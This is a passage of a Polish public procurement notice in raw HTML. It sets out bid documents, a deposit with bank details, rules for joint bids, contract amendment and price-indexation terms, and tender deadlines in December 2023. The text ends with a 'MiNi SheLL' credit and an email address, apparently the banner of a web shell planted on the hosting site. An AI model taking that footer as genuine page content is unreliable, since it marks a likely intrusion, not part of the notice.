SWZ), wykaz podwykonawców ( załącznika Nr 6 do SWZ) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a)	Wykonawca składa oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (zał. nr 5 do SWZ) - dotyczy wykonawcy, którego oferta zostanie najwyżej oceniona <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty wymagane przed zawarciem umowy od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza: <br/><br/>a) W przypadku złożenia oferty wspólnej - umowa regulująca współpracę wykonawców wspólnie ubiegających się o zamówienie.<br/>b) Wykaz podwykonawców, którzy będą zatrudnieni do realizacji zamówienia jeżeli Wykonawca deklarował w ofercie wykonanie części zamówienia przy udziale podwykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wadium w wysokości 5.000,00 zł (słownie: pięć tysięcy złotych 00/100 ) należy wnieść przed upływem terminu składania ofert w formie: pieniądzu na rachunek bankowy Zamawiającego w Banku BGK Nr 59 1130 1046 0600 0000 0002 4883<br/>Za datę i godzinę wniesienia wadium w pieniądzu liczy się datę i godzinę wpływu pieniędzy na konto Zamawiającego – do oferty należy dołączyć kserokopię dowodu wpłaty), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019r. poz. 310,836, i 1572.).<br/> Jeżeli wadium wnoszone będzie w poręczeniach lub gwarancjach w treści tych dokumentów musi znaleźć się oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wpłaty kwoty wadium na pierwsze żądanie zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 98 ust. 6 ustawy. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczeni, o których mowa w art. 97 ust. 7 pkt. 2-4 ustawy Pzp wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia , w postaci elektronicznej.<br/>Okres ważności wadium nie może być krótszy niż okres związania ofertą. <br/>Wadium dla wykonawców występujących wspólnie może być wniesione przez jednego z nich.<br/>Zwrot lub zatrzymanie wadium przetargowego nastąpi zgodnie z art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenia zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Umowa regulująca współpracę podmiotów składający wspólnie ofertę ma zawierać m.in. określenie celu gospodarczego, oświadczenie podmiotów o przyjęciu odpowiedzialności solidarnej, wskazanie podmiotu, któremu powierza się prowadzenie spraw i reprezentację na zewnątrz (pełnomocnika), adres podmiotu wspólnego lub pełnomocnika oraz numery telefonów i faksu umożliwiające Zamawiającemu kontakt z podmiotem wspólnym lub pełnomocnikiem, oznaczenie czasu trwania umowy, (wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia oraz okres gwarancji i rękojmi), zakaz zmian w umowie bez zgody Zamawiającego.<br/>Oferta, kosztorys ofertowy, a także wzór umowy muszą być podpisane przez wszystkie podmioty składające ofertę wspólną lub jeden podmiot spośród nich wytypowany do reprezentacji.<br/>Wykonawca wchodzący w skład podmiotu wspólnego nie może wchodzić w skład innego podmiotu wspólnego, gdy ten inny podmiot złoży ofertę. Wykonawca ten nie może ponadto sam złożyć oferty w tym przetargu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. <br/>Zamawiającemu przysługuje prawo do zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w szczególności gdy dotyczy:<br/>a)	zmiany przedmiotu zamówienia pod warunkiem, że będzie ona korzystna dla Zamawiającego albo zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy np. polegające na zmniejszeniu lub zwiększeniu zakresu przedmiotu zamówienia a wartość zmiany umowy nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie,<br/>b.	aktualizacji danych Wykonawcy poprzez zmianę w szczególności nazwy przedsiębiorstwa, zmianę adresu siedziby, zmianę formy prawnej Wykonawcy.<br/>c.	zmiany stawki podatku od towarów i usług<br/>d.	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r o minimalnym wynagrodzeniu za pracę (Dz.U. Nr 200, poz.1679 z póz. Zmianami),<br/>e.	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne <br/>f. zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 04 października 2018r. o pracowniczych planach kapitałowych (Dz.U. poz. 2215 oraz z 2019r. poz, 1074 i 1572)<br/>g.	zmiany kosztów związanych z realizacją zamówienia na podstawie wskaźników zmiany cen towarów i usług konsumpcyjnych ogłoszonego w komunikacie Prezesa Głównego Urzędu Statystycznego.<br/><br/>Jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/><br/>h. Zasady zmiany wynagrodzenia:<br/>1.przez zmianę kosztów rozumie się wzrost odpowiednio kosztów, jak i ich obniżenie,<br/>2.zmiana wynagrodzenia dopuszczalna jest co 6 miesięcy na pisemny wniosek Wykonawcy, który może być złożony nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy i będzie dotyczyć wynagrodzenia przysługującego wykonawcy za usługi zrealizowane po upływie tego terminu,<br/>3.zmiana wynagrodzenia nie może być wyższa niż o ½ wskaźnika zmiany cen towarów i usług konsumpcyjnych ogłoszonego w 6 miesiącu licząc od dnia zawarcia umowy w porównaniu z analogicznym miesiącem ub. roku, ogłoszony w informacji sygnalnej Prezesa Głównego Urzędu Statystycznego (miejsce publikacji strona www https://stat.gov.pl/sygnalne/informacje-sygnalne/, uwzględniając, że podział ryzyka jest po 50 % dla każdej ze stron umowy - w przypadku gdyby wskaźnik, o którym mowa w zadaniu poprzedzającym przestał być dostępny, zastosowanie znajdą inne, najbardziej zbliżone, wskaźniki publikowane przez Prezesa GUS,<br/>4.maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia nie może przekroczyć 10 % wynagrodzenia umownego,<br/>5.uprawnienie do złożenia wniosku o zmianę wynagrodzenia wykonawcy wygasa w dniu zakończenia realizacji umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę nalezy złożyć za pośrednictwem platformy e-zamowienia zakąłdki &#34;oferty/enioski&#34;widocznej na podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przyciski &#34;Złóż ofertę&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com